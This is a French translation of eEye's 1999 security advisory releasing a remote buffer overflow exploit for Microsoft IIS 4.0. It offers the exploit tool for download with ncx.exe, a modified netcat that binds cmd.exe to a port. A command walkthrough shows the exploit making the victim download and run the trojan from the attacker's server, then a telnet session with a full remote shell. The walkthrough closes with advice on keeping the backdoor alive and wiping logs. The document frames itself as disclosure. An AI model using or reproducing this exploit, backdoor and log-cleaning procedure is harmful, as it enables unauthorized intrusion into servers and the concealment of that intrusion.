Traduction par Yopyop YopYop Security z0ne http://come.to/yopyop Retina vs. IIS4, Round 2 - The Exploit Nous avons réfléchis a la mise en libertée de cet exploit et nous l'avobns fait! Voila pourquoi. Nous sommes une security team tres libre et nous n'avons aucun engagement avec aucune entreprise pour ne pas mettre public les découvertes que nous faisons. Notre responsabilitée face a nos client et face a la communautée d'internet est dévoiler le plus de détailles possibles, et que la ou nous nous sommes arretés, d'autres continurons de chercher et ainsi nous offrons notre contribution a la Security Community, et nous entretenons les vendeurs de logiciels a travailler encore plus dure pour sécuriser leurs produits. Cet exploit démontre l'importance du trou de sécuritée, OUI c'est un TRES GROS trou de sécurtitée qui mérite que l'on y préte attention. Si notre equipe commence a cacher les faits, nous ne serons pas meilleurs que les vendeurs de logiciels qui précipitent leurs logiciels insécurent sur le marché. Donc, c'est ici que cela commence... La Cible: Disons que nous prenons pour cible une compagnie X. Faite votre choix. We want to pretend this company has some "state of the art" security. They are locked down behind a Cisco Pix, and are being watched with the best of Intrusion Detection software. The server only allows inbound connections to port 80. Let's Dance. Nous avons construit notre exploit pour faire un overflow sur la machine distante puis pour downloader et en suite executer le trojan depuis notre serveur web. Le Trojan que nous utilisons pour cet exemple est ncx.exe. NCX.EXE est une version modifiée de netcat de sorte qu'il utilise toujours les arguments: -l -p 80 -t -e cmd.exe. Ces arguments on pour but de faire un lien entre cmd.exe et le port 80. L'executable a aussi ete compresse pour le rendre plus petit. Au lieu de 50k il ne fait plus que 31k. Downloads: iishack.exe iishack.asm ncx.exe (Port 80) ncx99.exe (Port 99) Nous avons eu des infos comme quoi certaines personnes n'arrivaient pas a reproduire l'exploit sur leu serveur. La raison est que ncx.exe essaye de faire un lien sur le port 80 avant que inetinfo n'ai quité. Nous avons donc crées une autre version de ncx qui fera un lien sur le port 99 (ncx99.exe), ce que devrait fixer le probleme. L'exploit devrait fonctionner sur n'importe quelle machine avec sp4 et sp5. Nous n'avons toutefois pas testés sur sp3 et nous amerions trop savoir si cela marche. Faite nous savoir. info@eEye.com X:\Code>iishack cible.com 80 notreserveur.net/ncx.exe ------(IIS 4.0 remote buffer overflow exploit)----------------- (c) dark spyrit -- barns@eeye.com. http://www.eEye.com [usage: iishack ] eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe do not include 'http://' before hosts! --------------------------------------------------------------- Data sent! Note: Laisser un peu de temps pour qu'il telecharge le trojan. X:\Code>telnet cible.com 80 Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\>[Vous avez un acces complet a la machine, bonne navigation :) ] C:\>[Reglez inetinfo pour qu'il soit redemaré toute les X minutes ] C:\>[Reglez ncx.exe pour qu'il soit redemaré toute les X-1 minutes] C:\>[Nettoyez toutes vos trace dans les logs.] C:\>exit Note: Une fois que nous sortons la session telnet, notre trojan, ncx.exe est déchargé de la mémoire et n'est plus en écoute sur le port 80. De se fait le service web peut redémarer et tout redeviens a la normal. L'exemple suivant a été démontré quelque peu rapidement, quelques détailles ont été laissés car l'advisory est déja assez grand. Special Thanks Pour le professeur barns@eeye.com pour le code de cet exploit et pour la démonstration du Kung Fu style. Copyright (c) 1999 eEye Digital Security Team eEye Digital Security Team info@eEye.com www.eEye.com Retina vs. IIS4, Round 2 Retina vs. IIS4, Round 2 - The Brain